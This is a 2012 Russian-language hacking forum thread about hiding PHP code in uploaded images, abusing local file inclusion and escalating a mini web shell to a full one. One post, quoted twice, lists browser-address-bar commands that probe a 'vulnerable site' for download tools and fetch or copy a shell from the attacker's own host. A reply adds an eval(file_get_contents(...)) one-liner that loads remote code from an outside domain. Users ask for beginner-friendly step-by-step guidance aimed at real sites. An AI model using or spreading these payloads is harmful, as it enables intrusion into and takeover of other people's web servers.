 |
|

11.03.2012, 07:56
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Alex2103,
lol. Как .jpg будет выполнятся как .php, если нет .htaccess-а? Думаю ТС сказал про exif, чтобы помочь при LFI.
|
|
|

11.03.2012, 13:50
|
|
Новичок
Регистрация: 06.03.2011
Сообщений: 4
С нами:
7993046
Репутация:
0
|
|
ребят подскажите я обхожу фильтры, у меня картинка закачивается
всё ок! коменты остаются
ну как мне понять работает ли эта уязвимость на этом сайте
вдруг админ заблочил
то есть, я имею ввиду, и так и сяк пробовал не получается ((
|
|
|

11.03.2012, 23:54
|
|
Постоянный
Регистрация: 17.04.2011
Сообщений: 638
С нами:
7932566
Репутация:
81
|
|
Сообщение от Га-Ноцри
Вы немножко вводите автора вопроса в заблуждение. Ведь если сайт не подвержен уязвимости типа LFI, то он просто не сможет проинклудить свою картинку с вредоносным PHP-кодом, который должен интерпретироваться, пусть даже если и повезло обойти фильтры.
И, да, к автору статьи огромная просьба. На своем опыте я понял, что многие могут столкнуться с такой проблемой - когда так скажем, мини-шелл, уже залит, а что делать дальше, чтобы залить полноценный, например тот же wso, не понятно. Отличным дополнением к статье было бы подробно описать синтаксис вводимого кода в строке браузера, когда уже залиты шеллы вида:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][/COLOR]
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
Например мы залили , тогда
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//уязвимый_сайт.ru/shell.php?cmd=which get;which wget;which lynx;which curl;which fetch;[/COLOR][/COLOR]
// Узнаем "качалку", если fetch, то
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//уязвимый_сайт.ru/shell.php?1=fetch http://мой хост/шелл.txt; mv шелл.txt 2.php[/COLOR][/COLOR]
// Заливаем полноценный шелл
Если мы залили , то
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//уязвимый_сайт.ru/shell.php?cmd=copy("http://путь_до_шелла_на_хосте.ru/shell.txt","./shell.php");[/COLOR][/COLOR]
Самое главное, сделать упор на конкретно вводимом коде в адресной строке браузера. Ведь не все не дружат с Гуглом и справочником по PHP-функциям. Если ТС понял, что я от него хочу, то думаю его статья станет настоящим шедевром и пошаговым пособием для начинающих "в картинках".
Как-то так, в общем.
ок, подправим
|
|
|

17.03.2012, 21:34
|
|
Участник форума
Регистрация: 09.02.2011
Сообщений: 218
С нами:
8029046
Репутация:
9
|
|
Сообщение от Га-Ноцри
Вы немножко вводите автора вопроса в заблуждение. Ведь если сайт не подвержен уязвимости типа LFI, то он просто не сможет проинклудить свою картинку с вредоносным PHP-кодом, который должен интерпретироваться, пусть даже если и повезло обойти фильтры.
И, да, к автору статьи огромная просьба. На своем опыте я понял, что многие могут столкнуться с такой проблемой - когда так скажем, мини-шелл, уже залит, а что делать дальше, чтобы залить полноценный, например тот же wso, не понятно. Отличным дополнением к статье было бы подробно описать синтаксис вводимого кода в строке браузера, когда уже залиты шеллы вида:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][/COLOR]
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
Например мы залили , тогда
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//уязвимый_сайт.ru/shell.php?cmd=which get;which wget;which lynx;which curl;which fetch;[/COLOR][/COLOR]
// Узнаем "качалку", если fetch, то
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//уязвимый_сайт.ru/shell.php?1=fetch http://мой хост/шелл.txt; mv шелл.txt 2.php[/COLOR][/COLOR]
// Заливаем полноценный шелл
Если мы залили , то
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//уязвимый_сайт.ru/shell.php?cmd=copy("http://путь_до_шелла_на_хосте.ru/shell.txt","./shell.php");[/COLOR][/COLOR]
Самое главное, сделать упор на конкретно вводимом коде в адресной строке браузера. Ведь не все не дружат с Гуглом и справочником по PHP-функциям. Если ТС понял, что я от него хочу, то думаю его статья станет настоящим шедевром и пошаговым пособием для начинающих "в картинках".
Как-то так, в общем.
зачем это, если можно тупо ?e=eval(file_get_contents('http://updateyou.ru/1.txt'));
|
|
|

24.03.2012, 15:34
|
|
Постоянный
Регистрация: 17.04.2011
Сообщений: 638
С нами:
7932566
Репутация:
81
|
|
Ну, это почти всегда срабатывает =)
|
|
|

25.03.2012, 07:40
|
|
Познающий
Регистрация: 04.06.2011
Сообщений: 45
С нами:
7863446
Репутация:
1
|
|
Полезная инфа благодарю, пару методов уже знал но всё равно добавилось знаний
|
|
|

25.03.2012, 19:57
|
|
Постоянный
Регистрация: 17.04.2011
Сообщений: 638
С нами:
7932566
Репутация:
81
|
|
Честно говоря, есть ещё пару методов, но их раскрывать не стоит
|
|
|

25.03.2012, 20:36
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Мы сдесь делимся общеми методами, чтоб была пища для мозгов что и как можно сделать и что из этого всего общего приготовить свое уникальное, а не своими уникальнастями)
P.S: OxoTnik - не выложим
|
|
|

25.03.2012, 22:00
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
С нами:
8850336
Репутация:
330
|
|
хватит выпендриваться. у вас просто нету ничего такого.
|
|
|

26.03.2012, 01:39
|
|
Постоянный
Регистрация: 16.05.2009
Сообщений: 309
С нами:
8940779
Репутация:
112
|
|
Охотник такой клоун, ой я не могу
P.s да покарает меня модер за флуд и оффтоп
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|